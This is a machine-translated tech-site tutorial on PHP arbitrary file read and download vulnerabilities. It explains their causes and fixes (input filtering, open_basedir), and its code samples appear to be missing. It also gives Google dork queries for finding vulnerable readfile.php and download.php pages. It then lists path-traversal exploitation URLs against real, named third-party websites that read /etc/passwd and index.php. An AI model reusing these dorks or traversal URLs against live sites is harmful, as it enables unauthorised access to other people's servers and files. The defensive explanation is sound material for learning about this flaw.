Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

Read and download any file

2025-04-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Background introduction of 0x00

The business needs of some websites may provide the function of viewing or downloading files. If there are no restrictions on the files viewed or downloaded by users, they can view or download any files, such as source files, sensitive files, and so on.

0x01 file reading

There are many ways to read files in PHP. By default in web, the $filename variable may be user-controllable.

# when the variable $filename is not checked, or the check is not strict, the user can control this variable to read any file, such as / etc/passwd, / config.ini, etc.

Two ways of downloading Files with 0x02

1. Download directly:

two。 Increase header head

When $filename is not verified or fails, the user can control this variable to download any file, such as / etc/passwd,./index.php, etc., which creates an arbitrary file download vulnerability.

The cause of 0x03

All have functions to read files.

The path of the reading file can be controlled by the user, and it has not been verified, or the verification is not strict.

Output the contents of the file

0x04 Google Serch

Inurl: "readfile.php?file=" inurl: "download.php?file="

0x05 repair scheme

Filter (point)

Regularize the parameter format entered by the user and match whether the input format is qualified or not

Php.ini configuration open_basedir

0x06 instance vulnerability exploitation

(for testing only, do not destroy at will)

Address:

Url: http://hypnet.org.uk/shared/readfile.php?file=mental_health_audit_2014_06_15_130552.ppt

Vulnerability exploitation:

Http://hypnet.org.uk/shared/readfile.php?file=../../../../../../../../../../etc/passwd

Address:

Url: http://storiedifarina.it/readfile.php?file=pdf/storiedifarina.pdf

Vulnerability exploitation

Http://www.wodehouse.se/upload/readfile.php?file=../index.php

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 275

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: File user variable vulnerability address file download mode format control input business content function function parameter instance situation cause scheme rule vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple MySQL Redmi Linux Xiaomi NVidia Shulou Technology Shulou Tech Info Shulou Information Huawei Apple macOS MariaDB OPPO Reno Docker Microsoft vpn MySQL Redmi Linux Xiaomi NVidia Shulou Technology Shulou Tech Info Shulou Information Huawei Apple macOS MariaDB OPPO Reno Docker Microsoft vpn

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report